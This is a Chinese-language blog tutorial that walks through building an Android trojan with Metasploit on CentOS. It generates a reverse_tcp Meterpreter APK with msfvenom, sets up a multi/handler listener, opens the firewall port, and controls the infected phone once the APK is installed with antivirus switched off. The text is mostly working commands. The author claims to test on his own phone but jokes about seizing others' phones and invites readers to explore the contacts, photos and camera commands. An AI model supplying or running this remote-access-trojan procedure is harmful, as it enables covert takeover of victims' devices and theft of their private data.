Centos Linux下使用Metasploit滲透android

Metasploit是一款開源的安全漏洞檢測工具

Metasploit是一款開源的安全漏洞檢測工具，可以幫助安全和IT專業人士識別安全性問題，驗證漏洞的緩解措施，並管理專家驅動的安全性進行評估，提供真正的安全風險情報。這些功能包括智能開發，代碼審計，Web應用程序掃描，社會工程。

這篇文檔只適合在Centos Linux已經安裝了Metasploit的大伙。沒有安裝Metasploit的小伙們，可以前往
https://blog.csdn.net/wyvbboy/article/details/51526640
博客去瀏覽並安裝，然后再回來~(如果此博客的安裝已經過期了，官方找或者網上找)

看完Metasploit簡介后，其下有一個工具msfvenom可以生成木馬，打開linux終端，最好登錄root，怕出錯，然后輸入命令

$ msfvenom

Enter下看看都啥？一大堆指令讓你煩~

先查看一下所有類型的攻擊負荷（看成木馬也行），輸入命令

$ msfvenom --list payloads

Enter下來，數據很多，我們從里面找Android類型的就行，我是來操控手機的，不會干其它的

復制一下黃色框的字段，tcp格式的，接下來會用到

android/meterpreter/reverse_tcp

知道了“木馬”的名稱，還得知道終端的ip，輸入ifconfig查看內網ip（俺的是本地測試的）

$ ifconfig

ip拿到了，還不趕緊的開始生成木木馬-_-，msfvenom兄弟，靠你了，輸入

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.122.129 LPORT=3333 R > first.apk

-p, --payload 使用攻擊負荷。指定一個’-'或者輸入(stdin)用戶自定義的payloads(攻擊負荷)。
LHOST ip地址
LPORT 自定義端口（注意，那些所謂的防火牆全踏馬都要關閉，記得端口要放行且沒被占用，不然滲透沒軟用）

生成的木馬最好能放在一個可以訪問的文件夾上，我直接first.apk，在終端目前路徑上可以看到有文件生成。如果沒有，那就是失敗了，檢查一下你的端口是否占用！生成成功的編譯大概會出現Payload size: 10181 bytes字段

 

 

木馬生成完畢，msfvenom兄弟的工作就基本完工了，接下來就有請msfconsole上場了，沒錯，就是打開metasploit的控制台，着手配置相關信息，開始滲透了~

直接輸入msfconsole

$ msfconsole

長久看多了單調代碼的你，下面的圖形代碼有沒有讓你灰色的世界多點點色彩~~

 

 

談正事~我們需要配置什么呢？前面生成木馬的時候不是設置了ip和端口嗎？現在我們也要在控制台上配置ip和端口，做監聽來的

要做的流程大概是這些

（在msfconsole模式下）加載exploit模塊

msf > use exploit/multi/handler

(exploit模式下)選擇之前我們粘貼過一次的攻擊載荷：android/meterpreter/reverse_tcp

msf exploit(multi/handler)> set payload android/meterpreter/reverse_tcp

(exploit模式下)查看一下列表有沒有多出你設置的載荷

msf exploit(multi/handler)> show options

(exploit模式下)設置黃色框下的LHOST和LPORT，就設置成之前生成木馬搞的ip和端口

順便放行端口，輸入命令firewall-cmd --add-port=3333/tcp

firewall-cmd --add-port=3333/tcp # 開放通過tcp訪問3333

配置的流程都搞完了，馬上就是滲透了。
群靈覺醒，封印解除，出來吧！exploit
輸入命令exploit，開始監控，記住不要關掉，就坐等別人的手機安裝，然后別人點擊的瞬間，俺這里馬上獲取到別人手機的控制權，到時候，嘿嘿_{。當然，俺這里是滲透自己的手機（然並軟}—~）

既然是滲透自己的手機，把生成的木馬拿出來下載吧，俺這里是ftp連接linux成功后，找到木馬下載安裝到自己的手機上（殺毒軟件請關掉），我用的是xftp，只要你能把那個木馬拿出來下載，管你用什么辦法~~

 

 

 

安裝好木馬后，點擊打開的瞬間，沒有啥反應。手機上沒反應沒關系，關鍵是終端exploit監聽有反應，並且開始滲透並成功。
如果終端沒有反應，就是防火牆的問題，設置的端口要放行

輸個?，查看命令列表

 

比如查看下手機信息

sysinfo

想打開某個應用，輸入app_list查看app列表

 

然后使用使用app_run命令打開app對應的package名稱

 

手機上的termux就會自己啟動

 

 

 好了，還有關於相冊或者通訊錄、照相什么的指令就不講了，你們自己探究探究吧